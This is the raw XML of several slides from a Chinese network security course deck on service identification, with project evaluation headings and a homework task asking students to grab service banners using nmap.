            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="10892790" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用nmap获取获取服务的banner信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
